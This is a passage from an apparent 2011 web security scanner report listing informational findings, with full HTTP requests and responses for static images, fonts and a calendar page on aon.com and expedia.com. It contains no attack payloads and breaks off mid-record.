Host:   http://www.aon.com
Path:   /manchesterunited/vagroundedstd-light-webfont.ttf

Request

GET /manchesterunited/vagroundedstd-light-webfont.ttf HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/manchesterunited/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/manchesterunited/%7C1317601722252%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"55356-1314119279000"
Last-Modified: Tue, 23 Aug 2011 17:07:59 GMT
Content-Length: 55356
Date: Sun, 02 Oct 2011 23:59:12 GMT

...........0BASE?bO........4FFTMG.GM... ....GDEF.;.........8GPOS...........4GSUB/.%.........OS/2z.7*.......`cmap..A.........cvt ..    O..
P...2fpgm../....t...egasp............glyf...t...P....head.C.....<
...[SNIP]...
29.8. http://www.expedia.com/static/default/default/eta/commonIcons.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/eta/commonIcons.gif

Request

GET /static/default/default/eta/commonIcons.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"2287-1317085605073"
Last-Modified: Tue, 27 Sep 2011 01:06:45 GMT
Content-Length: 2287
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

GIF89a..X..U.....f.3f.I...........Ky....P}.................)..........o\Vg......r....O8......Hu............................D+...t...j.Z..l....6[..:k.T}.x........t....6.V@...............i~...........
...[SNIP]...
29.9. http://www.expedia.com/static/default/default/html/calendar/v2.0.0/calendar.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/html/calendar/v2.0.0/calendar.html

Request

GET /static/default/default/html/calendar/v2.0.0/calendar.html HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"23583-1317080291907"
Last-Modified: Mon, 26 Sep 2011 23:38:11 GMT
Content-Length: 23583
Date: Mon, 03 Oct 2011 00:11:16 GMT
Connection: close

<!DOCTYPE HTML>
<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=UTF-8">
<script type="text/javascript" src="//media.expedia.com/media/content/shared/scripts/external/jquery/1.6.1/jquery.min.js">
...[SNIP]...
29.10. http://www.expedia.com/static/default/default/images/bubble_left_onblue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/bubble_left_onblue.gif

Request

GET /static/default/default/images/bubble_left_onblue.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/static/default/default/html/calendar/v2.0.0/calendar.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"627-1317085591070"
Last-Modified: Tue, 27 Sep 2011 01:06:31 GMT
Content-Length: 627
Date: Mon, 03 Oct 2011 00:10:40 GMT
Connection: close

GIF89a.....Y....T}.T}................W..................................................................................................................................................................
...[SNIP]...
29.11. http://www.expedia.com/static/default/default/images/bubble_right_onblue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/bubble_right_onblue.gif

Request

GET /static/default/default/images/bubble_right_onblue.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/static/default/default/html/calendar/v2.0.0/calendar.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"627-1317085594180"
Last-Modified: Tue, 27 Sep 2011 01:06:34 GMT
Content-Length: 627
Date: Mon, 03 Oct 2011 00:10:41 GMT
Connection: close

GIF89a.....Z....T}.T}................W..................................................................................................................................................................
...[SNIP]...
29.12. http://www.expedia.com/static/default/default/images/eta/sp_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/eta/sp_logo.gif

Request

GET /static/default/default/images/eta/sp_logo.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"5596-1317085626622"
Last-Modified: Tue, 27 Sep 2011 01:07:06 GMT
Content-Length: 5596
Date: Mon, 03 Oct 2011 00:09:36 GMT
Connection: close

GIF89a........}.....^..f..Av.^..i..a..{.`.. Ns.t..N......D.j.......p.W.$U.0d.m}.....a....n..P.P.Z`.\....S..L....h.P|[..C....:p.8n..2.\..z..t..p}..<....<r.r...7.{.`._ ...y..p...2km4Pt.....{.....}..v.@
...[SNIP]...
29.13. http://www.expedia.com/static/default/default/images/eta/stampa.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/eta/stampa.gif

Request

GET /static/default/default/images/eta/stampa.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1125-1317085621705"
Last-Modified: Tue, 27 Sep 2011 01:07:01 GMT
Content-Length: 1125
Date: Mon, 03 Oct 2011 00:09:36 GMT
Connection: close

GIF89aR.
....1-....#. aM4.c.$#&s]<..;\H(MIJ.....D.g2.h?lT.....f...A..........................................!..NETSCAPE2.0.....!.......,....R.
........ ....l..p,.....A.E.>...p..DcpX.-.Nd..0 ..f...z.
...[SNIP]...
29.14. http://www.expedia.com/static/default/default/images/hotel-sprite.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/hotel-sprite.gif

Request

GET /static/default/default/images/hotel-sprite.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"22991-1317085621866"
Last-Modified: Tue, 27 Sep 2011 01:07:01 GMT
Content-Length: 22991
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

GIF89a*.&....)........r..M.."w.$z.......W..M........F..7v.5......................3..............2..3.............5_..............E....q....................f.%~.....n.....Oy............................
...[SNIP]...
29.15. http://www.expedia.com/static/default/default/images/infosite/bg_button_b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/bg_button_b.gif

Request

GET /static/default/default/images/infosite/bg_button_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1127-1317085582989"
Last-Modified: Tue, 27 Sep 2011 01:06:22 GMT
Content-Length: 1127
Date: Mon, 03 Oct 2011 00:13:12 GMT
Connection: close

GIF89a........f..........!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
...[SNIP]...
29.16. http://www.expedia.com/static/default/default/images/infosite/bg_button_span_b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/bg_button_span_b.gif

Request

GET /static/default/default/images/infosite/bg_button_span_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1216-1317085591679"
Last-Modified: Tue, 27 Sep 2011 01:06:31 GMT
Content-Length: 1216
Date: Mon, 03 Oct 2011 00:13:11 GMT
Connection: close

GIF89a........f..........!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
...[SNIP]...
29.17. http://www.expedia.com/static/default/default/images/infosite/button_beak_b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/button_beak_b.gif

Request

GET /static/default/default/images/infosite/button_beak_b.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1184-1317085588075"
Last-Modified: Tue, 27 Sep 2011 01:06:28 GMT
Content-Length: 1184
Date: Mon, 03 Oct 2011 00:13:12 GMT
Connection: close

GIF89a...........f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
...[SNIP]...
29.18. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/hotel_detail_rating_bar.gif

Request

GET /static/default/default/images/infosite/hotel_detail_rating_bar.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"448-1317085626716"
Last-Modified: Tue, 27 Sep 2011 01:07:06 GMT
Content-Length: 448
Date: Mon, 03 Oct 2011 00:13:11 GMT
Connection: close

GIF89a:..............'.....
..........._..r..9..L....._..L..9..s........    ..r..8..K..8..K..`..&..s.....`......!.......,....:......` .di.h..@..p,.t.@.Kz/....'..
?!...-.8C.@.R..t;.^#[..J.^..[.0.p..6...
...[SNIP]...
29.19. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/icn_quote_beak_down.gif

Request

GET /static/default/default/images/infosite/icn_quote_beak_down.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1185-1317085585700"
Last-Modified: Tue, 27 Sep 2011 01:06:25 GMT
Content-Length: 1185
Date: Mon, 03 Oct 2011 00:13:09 GMT
Connection: close

GIF89aG.:..?...k........P..`..@..............#.........................;.....,..F........6..[..z..u..V..U..'..............[..F......................................1.....p..K..f.....e..J..(..K..f..e.
...[SNIP]...
29.20. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/icn_quote_beak_up.gif

Request

GET /static/default/default/images/infosite/icn_quote_beak_up.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1182-1317085617344"
Last-Modified: Tue, 27 Sep 2011 01:06:57 GMT
Content-Length: 1182
Date: Mon, 03 Oct 2011 00:13:14 GMT
Connection: close

GIF89aG.:..?...k........P..`..@..............#.........................;.....,..F........6..[..z..u..V..U..'..............[..F......................................1.....p..K..f.....e..J..(..K..f..e.
...[SNIP]...
29.21. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/rating_bar.gif

Request

GET /static/default/default/images/infosite/rating_bar.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
